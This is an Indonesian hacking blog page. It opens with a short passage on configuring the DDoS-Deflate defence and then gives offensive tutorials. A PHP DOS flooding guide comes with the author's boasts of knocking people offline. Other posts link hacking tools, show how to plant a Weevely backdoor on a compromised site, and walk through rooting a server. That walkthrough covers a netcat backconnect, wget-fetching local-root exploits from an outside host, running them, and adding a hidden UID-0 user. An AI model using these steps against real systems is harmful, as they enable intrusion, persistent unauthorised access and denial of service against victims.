dapat di esekusi ,,<br /> chmod 0700 install.sh<br /> ./install.sh<br /> nah klo sudah terinstall teman-teman dapat mengedit file-file configurasi sesuai kehendak..<br /> Untuk whitelist IP<br /> <blockquote class="tr_bq"><code>vim /usr/local/ddos/ignore.ip.list</code></blockquote>Untuk konfigurasi utamanya ada di<br /> <blockquote class="tr_bq"><code>vim /usr/local/ddos/ddos.conf</code></blockquote>kira – kira seperti ini defaultnya .. kalo mau di edit2 juga bisa <img alt="ketawa" border="0" src="http://devilzc0de.org/forum/images/smilies/ketawa.gif" style="vertical-align: middle;" title="ketawa" /><br /> <blockquote class="tr_bq"><code>##### Paths of the script and other files<br /> PROGDIR=”/usr/local/ddos”<br /> PROG=”/usr/local/ddos/ddos.sh”<br /> IGNORE_IP_LIST=”/usr/local/ddos/ignore.ip.list”<br /> CRON=”/etc/cron.d/ddos.cron”<br /> APF=”/etc/apf/apf”<br /> IPT=”/sbin/iptables”<br /> ##### frequency in minutes for running the script<br /> ##### Caution: Every time this setting is changed, run the script with –cron<br /> ##### option so that the new frequency takes effect<br /> FREQ=1<br /> ##### How many connections define a bad IP? Indicate that below.<br /> NO_OF_CONNECTIONS=150<br /> ##### APF_BAN=1 (Make sure your APF version is atleast 0.96)<br /> ##### APF_BAN=0 (Uses iptables for banning ips instead of APF)<br /> APF_BAN=1<br /> ##### KILL=0 (Bad IPs are’nt banned, good for interactive execution of script)<br /> ##### KILL=1 (Recommended setting)<br /> KILL=1<br /> ##### An email is sent to the following address when an IP is banned.<br /> ##### Blank would suppress sending of mails<br /> EMAIL_TO=”root”<br /> ##### Number of seconds the banned ip should remain in blacklist.<br /> BAN_PERIOD=600</code></blockquote>kira-kira begitu klo yang ane pake <img alt="malu" border="0" src="http://devilzc0de.org/forum/images/smilies/1.gif" style="vertical-align: middle;" title="malu" /><br /> semoga bermanfaat ya buat semua<img alt="sabar" border="0" src="http://devilzc0de.org/forum/images/smilies/sabar.gif" style="vertical-align: middle;" title="sabar" /><br /> suer nemu di google tuh trik <img alt="sabar" border="0" src="http://devilzc0de.org/forum/images/smilies/sabar.gif" style="vertical-align: middle;" title="sabar" /><br /> ane mau lanjut <img alt="belajar" border="0" src="http://devilzc0de.org/forum/images/smilies/belajar.gif" style="vertical-align: middle;" title="belajar" /> lagi biar pinter seperti idola ane <img alt="wawa" border="0" src="http://devilzc0de.org/forum/images/smilies/wawa.gif" style="vertical-align: middle;" title="wawa" /><br /> sekian semoga bermanfaat<br /> <br /> <br /> <a href="http://boeim-cyber.blogspot.com/2011/11/anti-ddos-dengan-ddos-deflate.html" target="_blank">Sumber</a>

Anti DDOS dengan DDOS-Deflate

ane cuma mau share tutor cupu yang ane dapet dari google barusan ini anti ddos versi google ok langsung saja cekidot Salah satu serangan...

Read more »

Flooding Dengan PHP DOS

Ada banyak cara untuk melakukan flooding dan juga ada banyak ragam tools yang bisa digunakan (salah satu yang terkenal adalah tembak.c yang hanya bisa berjalan di linux). Salah satu tools flooding yang mudah untuk di gunakan adalah PHP DOS, tools ini akan melakukan <a href="http://id.wikipedia.org/wiki/Serangan_DoS" target="_blank">Flood</a> Via <a href="http://id.wikipedia.org/wiki/Transmission_Control_Protocol" target="_blank">TCP</a> dan <a href="http://id.wikipedia.org/wiki/Udp" target="_blank">UDP</a> menuju ke target <a href="http://id.wikipedia.org/wiki/Protokol_Internet" target="_blank">IP</a> dengan <a href="http://id.wikipedia.org/wiki/Port_TCP_dan_UDP" target="_blank">Port</a><br /> <br /> tententu. Fungsinya? ya flooding sampai dengan target merasa terganggu.<br /> <br /> Tools ini biasa saya gunakan kalau lagi jengkel dengan orang yang banyak omong kosong, biasanya di chatroom ada yang ngomong sembarangan iseng saya flood sampai internetnya mati total, pernah juga saya gunakan mengganggu jaringan disekitar sini sampai berhari-hari hehehe…. jangan bilang-bilang ya <br /> <br /> Ada banyak pertanyaan dan pernyataan orang tentang PHP DOS. Yang paling umum adalah kenapa gagal? Gagal karena data yang kita kirimkan lebih kecil dari pipa yang digunakan target sehingga efeknya tidak akan terasa.<br /> <div class="separator" style="clear: both; text-align: center;"><a href="http://id.istanto.net/wp-content/uploads/2011/05/ist-gagal-1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="96" src="http://id.istanto.net/wp-content/uploads/2011/05/ist-gagal-1.jpg" width="320" /></a></div>Lalu bagaimana agar bisa berhasil? gampang, di balik saja!<br /> <div class="separator" style="clear: both; text-align: center;"><a href="http://id.istanto.net/wp-content/uploads/2011/05/ist-berhasil-1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="98" src="http://id.istanto.net/wp-content/uploads/2011/05/ist-berhasil-1.jpg" width="320" /></a></div>Dari gambar di atas sudah jelas aturannya jika kita ingin berhasil melakukan flooding resource kita harus lebih besar dari target. Resource ini meliputi kecepatan processor, jumlah random access memory, dan yang terpenting ialah kemampuan transfer data.<br /> <br /> Persyaratan umum yang diperlukan:<br /> <br /> Dedicated Server/Virtual Private Server (Windows/linux).<br /> XAMPP/LAMPP.<br /> Kemampuan transfer data yang sangat besar (misalnya 100GigaBytesPerSeconds)<br /> Mengikuti aturan diatas bahwa resource kita harus lebih besar dari target untuk itu saya arahkan ke dedicated server/virtual private server karena umumnya kedua produk ini resourcenya di atas rata-rata umum dan penggunaannya bebas tergantung kemauan pemiliknya. Setelah membeli salah satu produk ini selanjutkan kita install saja langsung xamp/lampp.<br /> <br /> Kemudian langkah selanjutnya <a href="http://www.ziddu.com/download/15102905/phpdos.rar.html" target="_blank">Download Filenya</a><br /> extract, lalu letakkan didalam folder public_html/htdocs apalah namanya yang jelas folder yang bisa diakses publik.<br /> Setelah itu akan kita dapatkan tampilan seperti ini..<br /> <div class="separator" style="clear: both; text-align: center;"><a href="http://id.istanto.net/wp-content/uploads/2011/05/ist-php-dos.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="209" src="http://id.istanto.net/wp-content/uploads/2011/05/ist-php-dos.jpg" width="320" /></a></div> Cara menggunakanny mudah saja, ketikkan IP target kedalam kolom IP. Pada kolom time kita masukkan interval berapa lama kita ingin melakukan flooding (dalam hitungan detik) misalnya kita ingin flood selama 1 jam maka valuenya adalah 60×60=3600. Pada kolom port kita bisa tentukan sendiri port berapa yang akan kita gunakan, umumnya adalah port 80. Setelah semua value kita masukkan tinggal klik pada tombol “start the attack” lalu browsernya jangan kita tutup.<br /> <br /> dalam 1-5 menit kedepan jika resource kita lebih besar daripada target maka dapat dipastikan target akan mengalami efek leher botol, yaitu data yang dikirimkan menuju target akan lebih besar dari kemampuan menerima target sehingga akibatnya target tidak bisa mengirimkan data keluar maupun masuk. yang akan dirasakan oleh target adalah koneksi internetnya terputus..<br /> <br /> <span style="color: red;">WARNING:</span><br /> <br /> Jangan digunakan pada shared hosting apalagi free hosting.<br /> Jangan terlalu iseng/sembarangan semua orang di flood, gunakan sebijak mungkin.<br /> Semua risiko yang dilakukan mengikuti artikel ini adalah tanggung jawab pribadi masing-masing.<br /> <br /> Credit: <strong><span class="largetext"><a href="http://devilzc0de.org/forum/23400">cliquersz</a></span></strong>

Flooding Dengan PHP DOS

Ada banyak cara untuk melakukan flooding dan juga ada banyak ragam tools yang bisa digunakan (salah satu yang terkenal adalah tembak.c yang...

Read more »

Share Tools Hacking [Update]

Sdkit Tools dari ane..<br /> <br /> <ul><li><a href="http://www.mediafire.com/download.php?k47z578hdxcc9r8" target="_blank">Havij Pro 1.15</a></li> <li><a href="http://www.mediafire.com/download.php?gtnj27brd14umr7" target="_blank">SQL Poizon aka Dork Scanner 5</a></li> <li><a href="http://www.mediafire.com/download.php?30y6xs3y15vyrz6" target="_blank">Webdav (Hmei7)</a></li> </ul><br /> <br /> <span class="Apple-style-span" style="color: red;"><i>[Update]</i></span>

Share Tools Hacking [Update]

Sdkit Tools dari ane.. Havij Pro 1.15 SQL Poizon aka Dork Scanner 5 Webdav (Hmei7) [Update]

Read more »

Backdooring With Weevely

kali ini kita akan melakukan backdooring menggunakan weevely....<br /> <span style="color: olive;">syarat : punya shell di situs target ex</span><span style="color: olive;">: <a href="http://target.com/uploads/r57.php" target="_blank">http://target.com/uploads/r57.php</a></span><br /> kl yang belum punya silahkan dilihat di <a href="http://code.google.com/p/weevely/" target="_blank">sini...<span style="color: olive;"> </span></a><br /> <br /> bagi pengguna backtrack dan blackbuntu ,weevely sudah ada ko...<br /> tinggal jalanin aja..<br /> Application >> pentest >> maintain access >> backdoors and rootkit >> weevely.<span style="color: olive;"> </span><br /> <span style="color: olive;"><br /></span><br /> setelah itu kita buat backdoornya pake perintah.<br /> <blockquote class="tr_bq"> ./weevely -g -o <filepath> -p <pass><br /> <filepatch> tempat simpan file backdoornya<br /> <pass> password untuk backdoornya</blockquote> <div class="separator" style="clear: both; text-align: center;"> <a href="http://jinc0rn.comli.com/photo/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="180" src="http://jinc0rn.comli.com/photo/1.png" width="320" /></a></div>  /home/jincorn/door.php >> tempat file backdoor<br /> jincorn >> passwornya<br /> <br /> coba kita ck dl file backdoornya..<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="http://jinc0rn.comli.com/photo/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="131" src="http://jinc0rn.comli.com/photo/2.png" width="320" /></a></div> udah ada tu kan door.php<br /> setelah itu kita upload backdoornya ke situs target melalui shell yang sudah kita siapkan...<div class="separator" style="clear: both; text-align: center;"> <a href="http://jinc0rn.comli.com/photo/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="165" src="http://jinc0rn.comli.com/photo/3.png" width="320" /></a></div> Oke..<br /> sekarang tinggal akses aja backdoor kita dari terminal...<br /> <blockquote class="tr_bq"> ./weevely -t -u <url> -p <password><br /> <url> situs target yang udah kita tanem backdoornya<br /> <password> pass backdoor yg tadi kita buat</blockquote> <div class="separator" style="clear: both; text-align: center;"> <a href="http://jinc0rn.comli.com/photo/4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="119" src="http://jinc0rn.comli.com/photo/4.png" width="320" /></a></div> oke kita tes...<br /> pake commad "ls aja..<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="http://jinc0rn.comli.com/photo/5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="164" src="http://jinc0rn.comli.com/photo/5.png" width="320" /></a></div> tukan semua file yang ada di situs target kelihatan...<br /> sekarang terserah kita..<br /> kita sudah tanem stealth backdoor...<br /> <br /> <a href="http://www.elirhab.com/" target="_blank">Credit</a><br /> <br /> <br /> <br />

Backdooring With Weevely

kali ini kita akan melakukan backdooring menggunakan weevely.... syarat : punya shell di situs target ex : http://target.com/uploads/r57.ph...

Read more »

Root Server & Menambahkan User Root Baru

<div class="separator" style="clear: both; text-align: center;"> </div> Cara untuk ngeroot server & menambahkan user root baru, dikemudian hari bisa digunakan lebih jauh.<br /> Hal yang dibutuhkan adalah:<br /> <ul> <li>Komputer & Kopi <img alt="ngopi" border="0" src="http://devilzc0de.org/forum/images/smilies/ngopi.gif" style="vertical-align: middle;" title="ngopi" /></li> <li>Situs target yang sudah di inject “shell backdoor”</li> <li>Tool-tool Localroot Exploit</li> <li>Netcat<br /> </li> </ul> <span style="font-weight: bold;">1. Cari Informasi Detail Server Target</span><br /> <br /> Buka shell php di website yang sebelumnya telah ter-hack & terpasang backdoor “shell php”<br /> <br /> Tampilannya akan seperti dibawah:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="http://images.devs-on.net/Image/Rxh6os7e4dge3uN-Region.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="151" src="http://images.devs-on.net/Image/Rxh6os7e4dge3uN-Region.png" width="320" /></a></div>  Langkah selanjutnya adalah pastikan anda mengetahui kernel server yang dipakai, biasanya sudah ada informasinya di “shell backdoor” seperti contoh di atas yaitu:<br /> <br /> Linux somerandomhosting.com 2.6.18-8.el5 #1 SMP Fri Jan 26 14:15:21 EST 2007 i686<br /> <br /> Atau anda juga bisa menggunakan dan menjalankan perintah: uname -a<br /> <br /> Dari informasi diatas kita ketahui bahwa kernelnya adalah: 2.6.18-8 i686<br /> <br /> Nah, setelah mengetahui informasi kernel, maka langkah yang harus dilakukan adalah cari dan temukan “LocalRoot Exploit” tool yang cocok untuk kernel diatas. Sediakan localroot untuk kernel ini: 2.6.18-8.el5 #1 SMP Fri Jan 26 14:15:21 EST 2007 i686.<br /> <br /> Kita cari disini saja localroot exploitnya, kebetulan banyak listnya: localroot.th3-0utl4ws<span style="font-weight: bold;"> </span><br /> <br /> <span style="font-weight: bold;">2. BackConnecting Dari Server Ke Komputer Attacker</span><br /> <br /> Seperti yang disampaikan sebelumnya, yang dibutuhkan dalam hal ini adalah:<br /> <br /> <ol type="1"> <li>Netcat Tools (Harus sudah terinstall di komputer)</li> <li>Open port (Port-port yang secara otomatis terbuka)<br /> </li> </ol> <br /> Buka netcat dan jalankan perintah berikut, misal port yang akan digunakan adalah 443:<br /> <br /> C:\WINDOWS\system32\cmd.exe – nc -l -n -v -p 443<br /> <br /> Kemudian tekan “Enter”<br /> <br /> Nanti akan muncul pesan “Listening on [any] 443 …”<br /> <br /> Setelah itu, kita kembali ke “shell backkdor” yang sudah kita tanamkan.<br /> Cari fungsi “Back Connect“, kemudian isikan IP yang kita miliki & port.<br /> <br /> Misal: IP Kita: 10.10.10.10 dan port: 443, seperti gambar dibawah:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="http://images.devs-on.net/Image/23cSqoxuW7FY3MO-Region.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="41" src="http://images.devs-on.net/Image/23cSqoxuW7FY3MO-Region.png" width="320" /></a></div> Kita jalankan perintah “Connect”<br /> <br /> Klo berhasil akan muncul seperti ini di layar command line kita, itu artinya back connect berhasil dengan sukses.<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="http://images.devs-on.net/Image/FuV6epg7POchdxV-CWINDOWSsystem32.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="159" src="http://images.devs-on.net/Image/FuV6epg7POchdxV-CWINDOWSsystem32.png" width="320" /></a></div> <b>3. Download Exploit & Eksekusi Exploit</b> <br /> Kita akan membutuhkan localroot exploit, bisa di download dari link yang sudah disebutkan diatas, adapun beberapa cara yang bisa dilakukan yaitu:<br /> <ul> <li>Menggunakan fungsi “WGET / CURL”</li> <li>Bisa menggunakan cara upload manual dari shell<br /> </li> </ul> Berhubung di server ini “WGET” bisa dilakukan, maka download localroot exploit memakai fungsi “WGET”.<br /> Oke, copy saja download link “localroot exploit yang tepat:<br /> <br /> Download Kumpulan Tools Localroot Dari Th3-0utl4ws<br /> Untuk mendownload tools diatas ketikkan saja perintah: <br /> <span style="font-weight: bold;">wget <a href="http://localroot.th3-0utl4ws.com/xploits/2.6.18-164.zip" target="_blank">http://localroot.th3-0utl4ws.com/xploits/2.6.18-164.zip</a></span><br /> <br /> Apabila sudah terdownload maka extract “local root tools” tersebut, bisa dengan menggunakan perintah “unzip” atau “untar” atau “tar”<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="http://images.devs-on.net/Image/vjUt4DhVknKljlm-CWINDOWSsystem32.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="159" src="http://images.devs-on.net/Image/vjUt4DhVknKljlm-CWINDOWSsystem32.png" width="320" /></a></div> <br /> Seperti contoh diatas, “localroot exploit sudah terdownload” dan ter-extract:<br /> <br /> unzip prct1.c.zip<br /> <br /> Langkah selanjutnya adalah mengcompile localroot exploit tersebut, karena menggunakan bahasa “C”, maka yang digunakan adalah perintah GCC:<br /> <br /> gcc prct1.c -o prc<br /> <br /> Kemudian jalankan:<br /> <br /> ./prc<br /> <br /> Catatan: Jika gagal dan muncul error, sebaiknya menggunakan tools “local root” exploit yang lainnya. (JANGAN MENYERAH!)<br /> <br /> Yang di atas masih gagal, lakukan lagi & cari exploit lainnya!<br /> <br /> Unzip lagi file localroot exploit yang lainnya: unzip 2.6.18-164.zip<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="http://images.devs-on.net/Image/XgNQSgGHdRXyIN5-CWINDOWSsystem32.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="159" src="http://images.devs-on.net/Image/XgNQSgGHdRXyIN5-CWINDOWSsystem32.png" width="320" /></a></div>  Nah, localroot exploit diatas sangat cocok untuk kernel ini: (“2.6.18-164“)<br /> <br /> Karena sudah berbentuk file yang sudah dicompile dan sudah bisa di eksekusi, langsung saja dieksekusi & jangan lupa change permissionnya jadi “777″, seperti contoh berikut:<br /> <br /> chmod 777 2.6.18-164<br /> <br /> Kemudian jalankan exploit:<br /> <br /> ./2.6.18-164<br /> <br /> Untuk mengecek apakah kita sudah berhasil mendapatkan akses root, check dengan perintah berikut:<br /> <br /> id<br /> or<br /> whoami<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="http://images.devs-on.net/Image/1nOr845qTNAPEn3-CWINDOWSsystem32.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="227" src="http://images.devs-on.net/Image/1nOr845qTNAPEn3-CWINDOWSsystem32.png" width="320" /></a></div> Jreng.. Jreng.. Jreng.. Anda sudah mendapatkan akses root, congrat!<br /> <br /> <span style="font-weight: bold;">3. Menambahkan User Root Baru</span><br /> <br /> Menambahkan user akses selevel dengan root sangatlah mudah, gunakan saja perintah berikut, sebagai contoh kita akan menambahkan akses root dengan user “Haxorfortutorial“:<br /> <br /> adduser -u 0 -o -g 0 -G 0,1,2,3,4,6,10 -M Haxorfortutorial<br /> <br /> Penjelasan perintah:<br /> Quote:<br /> <br /> adduser – Perintah dasar linux untuk menambahkan user<br /> <br /> -u 0 -o – set user menjadi dengan ID nol (0) root.<br /> <br /> -g 0 – Set initial group dengan ID nol (0) root.<br /> <br /> -G 0,1,2,3,4,6,10 – Set additional group ke:<br /> 0 = root<br /> 1 = bin<br /> 2 = daemon<br /> 3 = sys<br /> 4 = adm<br /> 6 = disk<br /> 10 = wheel<br /> <br /> -M – ‘home directory’ tidak di create ke user.<br /> <br /> Haxorfortutorial - User name of the new user account.<br /> <br /> Catatan: Rubah user Haxorfortutorial sesuai dengan username yang kalian inginkan, ini hanya contoh saja.<br /> <br /> Selanjutnya, lakukan set password untuk user yang telah kita buat.<br /> <br /> Perintahnya:<br /> passwd Haxorfortutorial<br /> <br /> Contoh implementasi:<br /> <br /> [root@fedora ~]# passwd Haxorfortutorial<br /> Changing password for user Haxorfortutorial.<br /> New UNIX password:<br /> Retype new UNIX password:<br /> passwd: all authentication tokens updated successfully.<br /> <br /> id Haxorfortutorial <br /> <div class="separator" style="clear: both; text-align: center;"> <a href="http://images.devs-on.net/Image/LEoszc56WjqoepL-CWINDOWSsystem32.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="100" src="http://images.devs-on.net/Image/LEoszc56WjqoepL-CWINDOWSsystem32.png" width="320" /></a></div> Semoga Membantu.. :)

Root Server & Menambahkan User Root Baru

Cara untuk ngeroot server & menambahkan user root baru, dikemudian hari bisa digunakan lebih jauh. Hal yang dibutuhkan adalah: Komp...

Read more »